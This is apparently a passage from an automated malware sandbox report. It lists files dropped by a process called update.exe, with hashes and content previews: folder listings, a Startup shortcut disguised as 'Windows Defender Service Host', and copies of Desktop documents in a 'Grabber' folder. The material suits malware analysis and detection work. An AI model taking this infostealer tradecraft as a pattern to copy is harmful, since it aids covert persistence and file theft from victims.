                                                  Preview:Downloads\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\OneDrive.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.023465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                  Malicious:false
                                                  Preview:OneDrive\...desktop.ini..

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\Pictures.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):88
                                                  Entropy (8bit):4.450045114302317
                                                  Encrypted:false
                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                  Malicious:false
                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\Startup.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.5269908036173305
                                                  Encrypted:false
                                                  SSDEEP:3:jgBLKSyA7V2AXAHKMJDv:j4LKSyA7VEKMJz
                                                  MD5:962BA2F38107171F546032264F2B3A87
                                                  SHA1:E6836B31DF2F3DE53E5534714D5142ED784ED4B4
                                                  SHA-256:87ECB05FFD7E3140524EAC373C7DD948030312DCFE2AA2B1B6ED9ED82A644EFA
                                                  SHA-512:01CE72E1DC2E9FA0F9A79C873885738114B842E92789AE7A4C9474894CAF7F5A86B1AC5F4B5D02D3F240B9D4921E2A89E85D14CB8A39D0FAE4F771F03573AE71
                                                  Malicious:false
                                                  Preview:Startup\...desktop.ini...Windows Defender Service Host.lnk..

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\Temp.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4403
                                                  Entropy (8bit):5.190546922929315
                                                  Encrypted:false
                                                  SSDEEP:96:4tiCKcwGT+jDM9Zw72fSASbSbdbsuEMnI0kjMC1GA03MjssMaLTjg/uZ9FGVpd0q:LYfa2fSASOpgu9nI0kjMC1GA08As5vLs
                                                  MD5:57F2274700E72465206D8890E8E1E8CF
                                                  SHA1:CE7893A55E77079654F4746DBEBED5C089DEB55D
                                                  SHA-256:6E03DB17AA0B035022980F9EDE70F34AC3C7D653C275571B2B2F42C174AA8153
                                                  SHA-512:C2EC4CD2B55F2915CE1764CE8A34A831A6173ED89F82CFC1ECFCA41BF2C092212DD8E2818B3DDC1BBD099D31CBF467FF179D4EDC71EB904CC053E65735EA5BDB
                                                  Malicious:false
                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-42-624.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-55-956.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696428505298658900_7B05BF2A-C74F-44F8-B674-AA3F9719008B.log.....App1696428527628431800_6CD9E3BB-4D03-46BD-8615-75A902267162.log.....App1696428537364279100_A2018481-B961-46B4-9328-34939DEAF293.log.....App1696428537364768600_A2018481-B961-46B4-9328-34939DEAF293.log...edge_BITS_6440_1090636871\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_6440_1191663050\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6440_1234978473\....1187695d-8276-4e31-8de1-9e57768989bd...edge_BITS_6440_1289371347\....78549187-a875-4f1e-8dfa-9938ebc29c81...edge_BITS_6440_1318414972\....873489b1-33b2-480a-baa2-641b9e09edcd...ed

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Directories\Videos.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):23
                                                  Entropy (8bit):3.7950885863977324
                                                  Encrypted:false
                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                  Malicious:false
                                                  Preview:Videos\...desktop.ini..

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
